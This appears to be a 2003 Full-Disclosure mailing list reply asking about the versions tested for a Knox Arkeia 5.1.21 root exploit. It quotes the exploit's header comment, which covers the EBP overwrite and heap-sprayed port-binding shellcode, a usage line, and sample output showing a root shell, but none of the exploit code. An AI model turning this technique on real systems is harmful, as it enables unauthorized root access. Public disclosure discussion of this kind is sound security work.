Re: Knox Arkeia 5.1.21 local/remote root exploit

[David Hane <dlhane () sbcglobal net>]

Have you tested this on other versions?

DH

On Friday 19 September 2003 10:36, A. C. wrote:
> Exploit attached for Knox Arkeia Pro v5.1.21 backup
> software from http://www.arkeia.com.
>
>
>
>
> /*
>  * Knox Arkiea arkiead local/remote root exploit.
>  *
>  * Portbind 5074 shellcode
>  *
>  * Tested on Redhat 8.0, Redhat 7.2, but all versions
> are presumed vulnerable.
>  *
>  * NULLs out least significant byte of EBP to pull EIP
> out of overflow buffer.
>  * A previous request forces a large allocation of
> NOP's + shellcode in heap
>  * memory.  Find additional targets by searching the
> heap for NOP's after a
>  * crash.  safeaddr must point to any area of memory
> that is read/writable
>  * and won't mess with program/shellcode flow.
>  *
>  * ./ark_sink host targetnum
>  * [user@host dir]$ ./ark_sink 192.168.1.2 1
>  * [*] Connected to 192.168.1.2:617
>  * [*] Connected to 192.168.1.2:617
>  * [*] Sending nops+shellcode
>  * [*] Done, sleeping
>  * [*] Sending overflow
>  * [*] Done
>  * [*] Sleeping and connecting remote shell
>  * [*] Connected to 192.168.1.2:5074
>  * [*] Success, enjoy
>  * id
>  * uid=0(root) gid=0(root)
> groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
>  *
>  *
>  */
>
>
>
>
> __________________________________
> Do you Yahoo!?
> Yahoo! SiteBuilder - Free, easy-to-use web site design software
> http://sitebuilder.yahoo.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html